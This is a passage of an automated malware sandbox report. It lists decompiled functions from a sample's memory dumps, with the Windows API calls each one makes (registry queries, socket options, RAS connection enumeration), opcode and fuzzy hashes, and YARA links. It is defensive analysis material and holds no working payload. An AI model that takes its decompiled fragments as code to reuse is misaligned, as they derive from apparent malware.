                                                                                              • Instruction Fuzzy Hash: 8701B571A002859FDB18CF29D885766FBA4EF40221F08C4EADC49CF246E274E444CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD1B6E, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04BD1BB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadShim
                                                                                              • String ID:
                                                                                              • API String ID: 1475914169-0
                                                                                              • Opcode ID: be2c40870efb5195367f947d089b6a2a27093c0aa313663ba6a300f41bf157e4
                                                                                              • Instruction ID: 29bd8b29d3c6b6a19e48fa850b9084c46fab47ca6e8f795c8428692eed39d699
                                                                                              • Opcode Fuzzy Hash: be2c40870efb5195367f947d089b6a2a27093c0aa313663ba6a300f41bf157e4
                                                                                              • Instruction Fuzzy Hash: E0018C756006049FEB20CF1AD984B22FBE8EF04721F0CC0D9ED498B652F275E408CA72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACA62E, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ACA672
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 139d1f409222b883ff139acd887cfc73cbd4aaed528d8d0c3fe411def126ec28
                                                                                              • Instruction ID: a1ba34f5524f7b02ae25c4a3cfb287631f58678c3094ced2ef54f8232c1fb195
                                                                                              • Opcode Fuzzy Hash: 139d1f409222b883ff139acd887cfc73cbd4aaed528d8d0c3fe411def126ec28
                                                                                              • Instruction Fuzzy Hash: 5B01AD718006049FDB218F55D844B62FFF0EF58320F08C4AEED894A652D375E418DF62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACBA82, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,?,?,?,?), ref: 00ACBAC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: setsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 3981526788-0
                                                                                              • Opcode ID: 0996790999e6e737844901167a704c570867619a3b88b307475e0d9f732c7e37
                                                                                              • Instruction ID: adf2737b879d7aebb9f608ac18a10cc40fc48471e72eddaf2f03fd11a5f163ea
                                                                                              • Opcode Fuzzy Hash: 0996790999e6e737844901167a704c570867619a3b88b307475e0d9f732c7e37
                                                                                              • Instruction Fuzzy Hash: 29018C714102409FDB208F55D885B56FFA0EF04320F0884AEED894B212D376A458DBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACB8E2, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNEL32(?,00000E80,?,?), ref: 00ACB932
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 9befd7faacb0b703706c54cad84078b8d84affa27e775632da5b28f3e0764793
                                                                                              • Instruction ID: c707857511db6b34a5b0d355bc73ed77dfd3c7bf0444304aac4a9f5f264f7446
                                                                                              • Opcode Fuzzy Hash: 9befd7faacb0b703706c54cad84078b8d84affa27e775632da5b28f3e0764793
                                                                                              • Instruction Fuzzy Hash: C801AD72500200ABD610DF1ADC86B22FBE8FB88B20F14C11AED094B745E671F916CBE6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACA352, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 00ACA384
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotification
                                                                                              • String ID:
                                                                                              • API String ID: 2591292051-0
                                                                                              • Opcode ID: d733f76dd801ef9ce27d91167498c4c61e0aaab4d040b322ee8af411a250726a
                                                                                              • Instruction ID: dd223fb2d53e56db32507942405a433870c5a495dcd6a8b82fb64ce0bd83f430
                                                                                              • Opcode Fuzzy Hash: d733f76dd801ef9ce27d91167498c4c61e0aaab4d040b322ee8af411a250726a
                                                                                              • Instruction Fuzzy Hash: E70184755002449FDB10CF55E884B65FBA4EF50324F18C4AADD498F342D2759444CA62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD02A6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetIfEntry.IPHLPAPI(?,00000E80,?,?), ref: 04BD02F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Entry
                                                                                              • String ID:
                                                                                              • API String ID: 3940594292-0
                                                                                              • Opcode ID: 88ae57d00e7ccb9cbc3520339ac86ee52e7017ae0b22061e107520ed304a70f9
                                                                                              • Instruction ID: 9dd4d12839749217589b7d17dcefb2f974477a3bf3a6cae965f55c2df9c9d488
                                                                                              • Opcode Fuzzy Hash: 88ae57d00e7ccb9cbc3520339ac86ee52e7017ae0b22061e107520ed304a70f9
                                                                                              • Instruction Fuzzy Hash: 3301AD72500200ABD610DF1ADC86B22FBE8FB88B20F14815AED084B745E635F916CBE6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD302A, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePeek
                                                                                              • String ID:
                                                                                              • API String ID: 2222842502-0
                                                                                              • Opcode ID: 48581c891e06dc1e10731414bc8415ea6653e44bae507f31c8d671ac549158d1
                                                                                              • Instruction ID: 14cddfa8a4d210d35e46f835f077c61524d21f8e384bd954e57c46a11324e32f
                                                                                              • Opcode Fuzzy Hash: 48581c891e06dc1e10731414bc8415ea6653e44bae507f31c8d671ac549158d1
                                                                                              • Instruction Fuzzy Hash: 6E01B1715006049FDB208F25D884B66FFE4EF04320F08C4EEED864B652E271E458DB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD1596, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MapViewOfFile.KERNEL32(?,?,?,?,?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD15D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              • Opcode ID: 556a282177ca8c77603ddbc944f73cc96effa7e37b81ca1d8e086edb3338c995
                                                                                              • Instruction ID: 6d954b97aeae0381b6db091c022b4c2a2c6586efe4ed7e2673b2600248de4cb3
                                                                                              • Opcode Fuzzy Hash: 556a282177ca8c77603ddbc944f73cc96effa7e37b81ca1d8e086edb3338c995
                                                                                              • Instruction Fuzzy Hash: C9019E755002049FDB20CF59D844B56FFE4EF04321F08C4EAED8A8B252E375A418DB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD21DA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RasEnumConnectionsW.RASAPI32(?,00000E80,?,?), ref: 04BD222A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ConnectionsEnum
                                                                                              • String ID:
                                                                                              • API String ID: 3832085198-0
                                                                                              • Opcode ID: 4ba650b3a1acaccb8002839792fbb80e39fb053c08b4dc0dec9249b788066923
                                                                                              • Instruction ID: 1a7ec5472018394dcf1b851a5562293c0583d50ed02e6f020179ffc15e5ec790
                                                                                              • Opcode Fuzzy Hash: 4ba650b3a1acaccb8002839792fbb80e39fb053c08b4dc0dec9249b788066923
                                                                                              • Instruction Fuzzy Hash: 1F01A272500200ABD610DF1ADC86B22FBE4FB88B20F14C11AED084B745E631F515CBE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD548A, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 04BD54C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: aa7fe95f4fef0e0bf4e655bc0f29fe861ddb78cbaa74b90931867a968c41d453
                                                                                              • Instruction ID: c37477a02c4d491f589c9ccba0709d679f15f01798e0ce8d38d273967e5b6072
                                                                                              • Opcode Fuzzy Hash: aa7fe95f4fef0e0bf4e655bc0f29fe861ddb78cbaa74b90931867a968c41d453
                                                                                              • Instruction Fuzzy Hash: 1B01B171501240AFDB208F1AD844B65FFA0EF04321F08C0DEDD4A4B656E275E458DF62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACA92A, Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: 6264dbae35cbff9fccd95e6109a541a202876ff0674d97fe39f5a08233cc5de3
                                                                                              • Instruction ID: 504ea82fd74b857cd108a083e4346e7d1c6b1cad86e45bc7a40e90e3ead22ae0
                                                                                              • Opcode Fuzzy Hash: 6264dbae35cbff9fccd95e6109a541a202876ff0674d97fe39f5a08233cc5de3
                                                                                              • Instruction Fuzzy Hash: 9401D1708002489FDB10CF15E889B66FFE4EF50324F19C4AADD498F246D279A448CBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD2E92, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindClose.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD2EC4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              • Opcode ID: 3a6ca01ea467e35bb0f1ee17bd46d9dd8dde38914c046531e1aca2f2e87fad90
                                                                                              • Instruction ID: e04674dae1513211348327dfa0ff888bb44c7486718b5ce0ec211f5700247a10
                                                                                              • Opcode Fuzzy Hash: 3a6ca01ea467e35bb0f1ee17bd46d9dd8dde38914c046531e1aca2f2e87fad90
                                                                                              • Instruction Fuzzy Hash: 2801F4756002849FDB148F19D884766FFA4EF00320F08C4EADD498F752E275E448DEB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD53EA, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD541C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: e7f714ae6bafe356b93ff0d7156459de71d44679d2220fcf71d257f09afaed55
                                                                                              • Instruction ID: 3b3ea1f3f07289b0350287e0d09b0aa4382afbad37b8944714f48153a9a6075c
                                                                                              • Opcode Fuzzy Hash: e7f714ae6bafe356b93ff0d7156459de71d44679d2220fcf71d257f09afaed55
                                                                                              • Instruction Fuzzy Hash: D701AD756002049FDB208F1AE885B62FFA4EF40221F08C0EADD5A8B656E275F448DF72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD291A, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,?,?,?), ref: 04BD2955
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 3c22a05a03214bcf151f27a58731da1171ee7fba2a0a53bb4db97054bb6cb611
                                                                                              • Instruction ID: de4c515be6fcd882f24f98187a1e7391d171abcbfa76416d2c51e13a4b29190c
                                                                                              • Opcode Fuzzy Hash: 3c22a05a03214bcf151f27a58731da1171ee7fba2a0a53bb4db97054bb6cb611
                                                                                              • Instruction Fuzzy Hash: 6001A231900344DFDB208F45E844B25FFA0EF54320F08C4EADD890B26AE275A458DB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACAA8E, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,?,?), ref: 00ACAAC6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: ff127de03e75d0ef482a0cd356f9fe800a627090c303ddebc9fd916ebe4ac28e
                                                                                              • Instruction ID: 42f954f21a1623a7eb635237d463a57c1eee07c5a352ec0316fa871be8b93584
                                                                                              • Opcode Fuzzy Hash: ff127de03e75d0ef482a0cd356f9fe800a627090c303ddebc9fd916ebe4ac28e
                                                                                              • Instruction Fuzzy Hash: 8301D1314006089FDB208F05D984B22FFB0EF14324F08C49ADD8A0B252D275A459DBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACA6F2, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 00ACA724
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ErrorMode
                                                                                              • String ID:
                                                                                              • API String ID: 2340568224-0
                                                                                              • Opcode ID: e4bd2ab41548d5c5dceb81dcf2f041d72839e637e70ba3cbbe00a8d3812b921a
                                                                                              • Instruction ID: f3ce668e07581b946b03f2d88c9f298b0ea696db9b9e5b8ec781d54618ba34ea
                                                                                              • Opcode Fuzzy Hash: e4bd2ab41548d5c5dceb81dcf2f041d72839e637e70ba3cbbe00a8d3812b921a
                                                                                              • Instruction Fuzzy Hash: 5EF0AF744002489FDB208F19D884B61FFB4EF54324F18C0AADD498B652D679A448CFB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD55F2, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DispatchMessageW.USER32(?), ref: 04BD5624
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatchMessage
                                                                                              • String ID:
                                                                                              • API String ID: 2061451462-0
                                                                                              • Opcode ID: 22446dff5d32a42013c8615e7ac5eb4bb3e6f14d52fced841f72f3d8946c0e47
                                                                                              • Instruction ID: b6963fd282320706065ba8b2a516e26b1a4063ea0902736ae82dd4d227688411
                                                                                              • Opcode Fuzzy Hash: 22446dff5d32a42013c8615e7ac5eb4bb3e6f14d52fced841f72f3d8946c0e47
                                                                                              • Instruction Fuzzy Hash: B0F0AF74514244AFEB208F15DC84B61FFA0EF44720F08C0EADD494B252E675B448CFB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 94%
                                                                                              			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                                                                                              0x00403e3d
                                                                                              0x00403e43
                                                                                              0x00403e49
                                                                                              0x00403e7b
                                                                                              0x00403e80
                                                                                              0x00403e86
                                                                                              0x00000000
                                                                                              0x00403e86
                                                                                              0x00403e4d
                                                                                              0x00403e4f
                                                                                              0x00403e4f
                                                                                              0x00403e66
                                                                                              0x00403e6f
                                                                                              0x00403e77
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403e57
                                                                                              0x00403e59
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403e5c
                                                                                              0x00403e61
                                                                                              0x00403e62
                                                                                              0x00403e64
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403e64
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                                              • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                                                                                              • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                                              • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00BDBEA8, Relevance: 1.0, Instructions: 973COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385879081.0000000000BDB000.00000040.00000040.sdmp, Offset: 00BDB000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d36d33b83cecd493d55f84cd1a595bc4b00239e37ef430f151fb198fb6de7137
                                                                                              • Instruction ID: 904842b0329cfde71f46340366ca8d9a5fa71570b92429fe1900fcd583ab7368
                                                                                              • Opcode Fuzzy Hash: d36d33b83cecd493d55f84cd1a595bc4b00239e37ef430f151fb198fb6de7137
                                                                                              • Instruction Fuzzy Hash: E7D1626544E3C11FD71387B09C6AAA1BFB1AF03214F1E82EBC0C4CF5A3D259484AD762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 067B11EE, Relevance: .1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.390474594.00000000067B0000.00000040.00000001.sdmp, Offset: 067B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 279b87e681fad661f40b4a02c797124c230a9b21a560b9e2aac8cad342d8f436
                                                                                              • Instruction ID: 816da53e6f1ef0e63edb184fd9585de0a9433246495df2c2dbca9f24af5cc5d7
                                                                                              • Opcode Fuzzy Hash: 279b87e681fad661f40b4a02c797124c230a9b21a560b9e2aac8cad342d8f436
                                                                                              • Instruction Fuzzy Hash: 3421C8B5508341AFD340CF19D840A5BFBE4FF89660F04896EF988D7311E275E9058B62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 067B1C60, Relevance: .1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.390474594.00000000067B0000.00000040.00000001.sdmp, Offset: 067B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7c7af4107c204eda57275c0ddbe385f0bbca320b4114914adf496c4d1ba2fcc0
                                                                                              • Instruction ID: d287b7eadb0b9b48b976a5a2037f33dc27bb29e247be324ad041adc8823859cf
                                                                                              • Opcode Fuzzy Hash: 7c7af4107c204eda57275c0ddbe385f0bbca320b4114914adf496c4d1ba2fcc0
                                                                                              • Instruction Fuzzy Hash: DD11BAB5508341AFD350CF19D880A5BFBE4FB88664F04896EF898D7311E235EA148FA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00BD83BC, Relevance: .1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385758130.0000000000BD0000.00000040.00000040.sdmp, Offset: 00BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d3fffa676af8c0ac1c4fcd691073d6ea415bf603fb94371f2e7427ba057eecca
                                                                                              • Instruction ID: a0d781628c25eb0c21a07d729328cd9331cf74b9a6753c4ce796704f940d2cfd
                                                                                              • Opcode Fuzzy Hash: d3fffa676af8c0ac1c4fcd691073d6ea415bf603fb94371f2e7427ba057eecca
                                                                                              • Instruction Fuzzy Hash: DE11E430208642DFD705CB14C980B26FBD1EB88709F24C9DEE9491B752DB7BD803CA51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00BDC684, Relevance: .1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385879081.0000000000BDB000.00000040.00000040.sdmp, Offset: 00BDB000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 00829526e2808f65e76d3ea1871f43cd0c37bce1eb0841ef00edb40f4b294832
                                                                                              • Instruction ID: bdcfa8896fbf05f62a83c9c2b9fe284945006c9f72d6dd658756508c2beb5eaa
                                                                                              • Opcode Fuzzy Hash: 00829526e2808f65e76d3ea1871f43cd0c37bce1eb0841ef00edb40f4b294832
                                                                                              • Instruction Fuzzy Hash: BA11B1342046829FD715CB14C980B26FFE5EB85708F34CAAEE9495B752D73BC803CA51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00BD8383, Relevance: .1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385758130.0000000000BD0000.00000040.00000040.sdmp, Offset: 00BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fe10ea53af8ee3f6b32a3814b54217ad9e34d902ee06d9fd7e28892f527f5782
                                                                                              • Instruction ID: 795350558b54e6013d7db204fe785dc7b581658d4778dae47c67339cb21077e1
                                                                                              • Opcode Fuzzy Hash: fe10ea53af8ee3f6b32a3814b54217ad9e34d902ee06d9fd7e28892f527f5782
                                                                                              • Instruction Fuzzy Hash: 21215B3510D3C18FD703CB20C960B55BFB1AB46608F1986DFD8898B6A3D73A880ACB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00AEADEC, Relevance: .1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385240715.0000000000AE2000.00000040.00000001.sdmp, Offset: 00AE2000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 81f2d36c9dabbe83f645f7d96c34981d4b119fd3ba9cbb3faeeb0937b3d8f8ab
                                                                                              • Instruction ID: 3565900effc44fb1ca723f95b939e48284b37284345bcaf973d6ee16370806ab
                                                                                              • Opcode Fuzzy Hash: 81f2d36c9dabbe83f645f7d96c34981d4b119fd3ba9cbb3faeeb0937b3d8f8ab
                                                                                              • Instruction Fuzzy Hash: E811FAB5508301AFD350CF49DC80E57FBE8FB88660F04892EFD9997311E231E9088BA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 067B1B04, Relevance: .1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.390474594.00000000067B0000.00000040.00000001.sdmp, Offset: 067B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 763cdc9668e4e52a437c56e6003a2264e8f313faed3d4ffccb1577d8fa5cea87
                                                                                              • Instruction ID: 9d117973eaec23e263bd86bc773b8088f1dfb9f5647f42075982911a47f47011
                                                                                              • Opcode Fuzzy Hash: 763cdc9668e4e52a437c56e6003a2264e8f313faed3d4ffccb1577d8fa5cea87
                                                                                              • Instruction Fuzzy Hash: 4F11FAB5508301AFD750CF09DC80E57FBE8FB88660F04892EFD9997311E231E9088BA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00BD05CF, Relevance: .0, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385758130.0000000000BD0000.00000040.00000040.sdmp, Offset: 00BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f29eb1c9e3c4158662084482bc59b9ecb543d0dfb10c585b2d552d6feea3a84a
                                                                                              • Instruction ID: c82d53e34e9bafc2b0d13e7e61568f23b8d5f27243af4d441476c97cf9cfd411
                                                                                              • Opcode Fuzzy Hash: f29eb1c9e3c4158662084482bc59b9ecb543d0dfb10c585b2d552d6feea3a84a
                                                                                              • Instruction Fuzzy Hash: 3B01F77650D7806FD7128F069C40862BFB8DB46220708849FEC898B652D125A809CB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00BD8478, Relevance: .0, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385758130.0000000000BD0000.00000040.00000040.sdmp, Offset: 00BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 693b7c54016a59cdbfed5bf97d611671327a7796b2b33607a59a4987e9e37b45
